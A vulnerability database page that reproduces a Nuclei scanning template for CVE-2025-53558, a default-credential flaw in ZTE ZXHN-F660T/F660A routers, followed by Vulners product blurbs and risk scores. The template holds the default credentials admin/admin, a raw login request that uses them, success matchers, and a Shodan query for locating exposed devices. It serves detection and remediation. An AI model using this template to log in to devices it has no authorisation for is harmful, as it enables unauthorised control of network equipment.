Lucene search
K

ZTE ZXHN-F660T/F660A - Default Credentials

🗓️ 30 Apr 2026 05:10:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

ZTE ZXHN-F660T/F660A uses common credentials, allowing unauthorized access to affected devices.

Related
Refs
Code
id: CVE-2025-53558

info:
  name: ZTE ZXHN-F660T/F660A - Default Credentials
  author: DhiyaneshDK
  severity: high
  description: |
    ZXHN-F660T and ZXHN-F660A provided by ZTE Japan K.K. use a common credential for all installations. With the knowledge of the credential, an attacker may log in to the affected devices.
  impact: |
    Attackers with knowledge of common credentials can access ZTE device management interfaces, potentially gaining control over network equipment and configurations.
  remediation: |
    Change default credentials immediately and restrict access to the web management interface to trusted administrators only.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53558
    - https://jvn.jp/en/jp/JVN66546573/
  metadata:
    shodan-query: title:"F660"
    verified: true
    max-request: 1
  tags: cve,cve2025,default-login,zte,vuln,vkev

variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}

        frashnum=&action=login&Frm_Logintoken=0&Username={{username}}&Password={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: location
        words:
          - "/start.ghtml"

      - type: status
        status:
          - 302

      - type: word
        part: body
        words:
          - "wrong username"
          - "User information is error"
        negative: true
# digest: 4a0a00473045022100b328632536b25e561fa3ee75cecae88b4c331faf7eb537b934555d6259ad40e402206953d0ec987bdc4c4a43742cb127346de25e8661f041ba58b27b22aea510b42c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8High risk
Vulners AI Score8
CVSS 48.7
CVSS 38.8
EPSS0.0135
SSVC
20